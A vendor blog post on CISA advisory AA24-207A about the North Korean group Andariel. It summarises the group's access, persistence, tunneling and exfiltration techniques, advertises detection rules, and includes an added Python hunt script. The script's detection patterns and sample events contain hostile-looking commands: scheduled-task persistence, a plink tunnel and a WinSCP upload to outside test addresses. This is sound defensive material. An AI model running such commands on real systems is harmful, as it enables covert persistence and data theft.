Andariel Attack Detection: FBI, CISA, and Partners Warn of an Increasing Global Cyber-Espionage Campaign Linked to the North Korean State-Sponsored Group

July 29, 2024 · 5 min read

The FBI, CISA, and leading cybersecurity authorities have issued a warning over growing North Korean cyber-espionage operations linked to the nation-backed hacking group tracked as Andariel. The group’s cyber-espionage activity involves the collection of critical data and intellectual property, thereby advancing the regime’s military and nuclear objectives and aspirations.

Detecting Andariel Attacks Described in CISA AA24-207A Advisory

Since geopolitical tensions have been intensifying globally, state-sponsored hacking collectives have been on the rise in recent years. This trend poses a growing menace for cyber defenders due to the increasing scope and sophistication of attackers’ toolkits. North Korean APT groups remain among the most active collectives in Q1 2024, sharing the top spot with Chinese, Iranian, and Russian actors.

The latest cyber-espionage activity covered in the AA24-207A CISA Advisory urges cybersecurity practitioners to enhance their defenses against Andariel (aka Onyx Sleet), which is currently going after sensitive information related to defense, nuclear, and engineering assets worldwide. The SOC Prime Platform for collective cyber defense offers a collection of dedicated Sigma rules to identify related malicious activity, paired with advanced threat detection and hunting solutions to streamline threat investigation.

Just hit the Explore Detections button below and immediately drill down to a tailored detection stack to spot the latest cyber-espionage campaign by Andariel APT. All the rules are compatible with 30+ SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK® framework. Additionally, rules are enriched with extensive metadata, including threat intel references, attack timelines, and recommendations.

Explore Detections

Cyber defenders seeking more rules to address Andariel’s TTPs might search Threat Detection Marketplace using a custom “Andariel” tag or simply follow this link to access a broader collection of rules associated with the group’s malicious activity.

North Korean Global Cyber-Espionage Attack Analysis Covered in the AA24-207A Alert

On July 25, 2024, the FBI, CISA, and authoring partners issued a new joint cybersecurity advisory, AA24-207A, notifying defenders of the increasing risks related to the growing cyber-espionage activity of the nefarious North Korean state-sponsored group. Andariel, aka Onyx Sleet (PLUTONIUM, DarkSeoul, and Stonefly/Clasiopa), mainly targets defense, aerospace, nuclear, and engineering entities worldwide to collect sensitive and technical information, furthering the regime’s military and nuclear programs and objectives. The group, which has been active in the cyber threat arena since at least 2009, is believed to have evolved from carrying out destructive attacks against U.S. and South Korean organizations to engaging in targeted cyber-espionage and ransomware operations. Defenders consider the group’s ongoing cyber-espionage activity a persistent threat to diverse global industry sectors. Moreover, attackers linked to the Democratic People’s Republic of Korea (DPRK)’s RGB 3rd Bureau finance their offensive operations via ransomware attacks on U.S. healthcare organizations.

Andariel actors gain initial access by weaponizing known flaws, including the Log4Shell vulnerability, to deploy a web shell and access sensitive information and applications. They use standard system discovery and enumeration techniques, establish persistence via scheduled tasks, and elevate privileges with tools like Mimikatz. Adversaries deploy custom malware implants, RATs, and open-source tools for execution, lateral movement, and data exfiltration. The custom tools and malware leveraged by Andariel possess sophisticated capabilities, such as executing arbitrary commands, keylogging, taking screenshots, listing files and directories, stealing browser history, and uploading content to C2 nodes, which enables adversaries to maintain access to the compromised system, with each implant assigned a specific C2 node.

Adversaries are also skilled at employing native tools and processes on systems, a tactic known as living off the land (LOTL). They leverage the Windows command line, PowerShell, WMIC, and Linux bash for system, network, and account enumeration. Additionally, Andariel conducts phishing campaigns using malicious attachments, such as LNK files or HTA script files, which are often delivered inside zip archives.

They also rely on tunneling tools like 3Proxy, PLINK, and Stunnel, along with custom proxy tunneling utilities, to route traffic over various protocols from within a network to a C2 server. This tunneling allows hackers to conduct C2 operations despite network configurations that would usually be restrictive.

As for data exfiltration, Andariel commonly relies on cloud storage or servers separate from their primary C2. They have been observed logging into their cloud storage accounts directly from victim networks and using tools like PuTTY and WinSCP to transfer data to North Korea-controlled servers via FTP and other protocols. Additionally, they stage files for exfiltration on the compromised machines.
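As an added illustration (not part of the advisory or of SOC Prime's rule set), the following Python hunt turns the TTPs described above, scheduled-task persistence, Mimikatz, LOTL enumeration via WMIC, tunneling tools, and PuTTY/WinSCP transfers, into heuristics over process-creation events and escalates hosts where several distinct techniques fire together. The event schema (host, image, cmdline), the rule regexes, and the sample events are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Heuristics mirroring the TTPs the advisory narrative lists: scheduled-task
# persistence, Mimikatz, LOTL enumeration via WMIC, tunneling tools, and
# PuTTY/WinSCP transfers. The event schema (host, image, cmdline) is assumed.
RULES = [
    ("Scheduled task persistence", "T1053.005",
     re.compile(r"schtasks(\.exe)?\b.*\s/create\b", re.I)),
    ("Mimikatz execution", "T1003",
     re.compile(r"\bmimikatz\b", re.I)),
    ("LOTL enumeration via WMIC", "T1082",
     re.compile(r"\bwmic(\.exe)?\s+(computersystem|useraccount|process|qfe)\b", re.I)),
    ("Tunneling tool execution", "T1572",
     re.compile(r"\b(plink|3proxy|stunnel)(\.exe)?\b", re.I)),
    ("Transfer via PuTTY tools or WinSCP", "T1048",
     re.compile(r"\b(pscp|psftp|winscp)(\.exe)?\b", re.I)),
]

def match_event(event):
    """Return (technique, rule name) for every rule that fires on one event."""
    haystack = f"{event['image']} {event['cmdline']}"
    return [(tid, name) for name, tid, rx in RULES if rx.search(haystack)]

def hunt(events):
    """Map each host with at least one hit to its sorted distinct techniques."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["host"]].update(match_event(ev))
    return {host: sorted(v) for host, v in hits.items() if v}

def escalate(events, min_techniques=2):
    """Hosts with >= min_techniques distinct techniques: one hit is noise, a chain is triage."""
    return sorted(h for h, v in hunt(events).items() if len(v) >= min_techniques)

# Constructed sample events, not real telemetry (RFC 5737 test addresses).
SAMPLE_EVENTS = [
    {"host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Updater /tr C:\Users\Public\u.exe /sc onlogon"},
    {"host": "WS01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic useraccount get name,sid"},
    {"host": "WS01", "image": r"C:\Users\Public\plink.exe",
     "cmdline": "plink.exe -ssh -N -P 443 203.0.113.10"},
    {"host": "SRV02", "image": r"C:\Tools\WinSCP.exe",
     "cmdline": "winscp.exe /command open ftp://203.0.113.20 put archive.zip"},
    {"host": "WS03", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]
```

Running `hunt(SAMPLE_EVENTS)` attributes three techniques to WS01 and one to SRV02, so `escalate` returns only WS01; the same grouping logic carries over to a SIEM correlation rule built on the Sigma detections mentioned above.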

Critical infrastructure organizations are strongly recommended to stay vigilant against North Korean state-sponsored cyber-espionage attacks. To mitigate the risks of Andariel’s increasing malicious activity, the advisory encourages global organizations to promptly apply patches for known vulnerabilities, secure web servers against web shells, monitor endpoints for malicious activity, and strengthen authentication and remote access protections.

The persistent cyber-espionage attacks attributed to Andariel, the notorious North Korean state-sponsored group, are increasingly endangering critical infrastructure organizations globally. To help security teams identify potential intrusions in a timely manner and minimize the risk of data breaches, rely on SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting, and Detection Stack Validation, which equips organizations with an all-in-one solution for collective cyber defense.
